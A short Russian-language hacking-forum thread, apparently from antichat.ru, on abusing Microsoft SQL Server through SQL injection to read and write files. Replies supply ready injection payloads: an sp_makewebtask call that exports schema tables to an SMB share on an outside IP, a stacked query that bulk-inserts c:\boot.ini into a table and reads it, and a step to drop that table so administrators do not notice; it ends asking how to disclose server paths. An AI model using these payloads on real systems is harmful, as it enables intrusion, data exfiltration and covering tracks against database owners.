подскажите есть ли в mssql какиенибудь функции для работы с файлами (например как в мускуле LOAD_FILE, INSERT INTO OUTFILE)

Провидение Иньекций в MSSQL сервер от Microsoft. (http://forum.antichat.ru/threadnav30501-1-10.html)

дамп базы:
BACKUP DATABASE TO DISK = N'c:\path\'

можно использовать sp_makewebtask, чтобы записать запрос в HTML:
'; EXEC master..sp_makewebtask "\\10.20.30.40\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
указываемый IP должен иметь папку "share" с доступом для Everyone.

http://forum.antichat.ru/showpost.php?p=523825&postcount=36
Для начала создадим таблицу file с полем text
[b];create table file(text varchar(8000))--
далее запишем туда файл используя конструкцию bulk insert
bulk insert file from 'c:\boot.ini '
и прочтем собственно
select top 1 text from file
Удалим дабы не спалили админы
;drop table file

спасибо)

а есть какиенибудь @@ переменные чтобы пути раскрыть?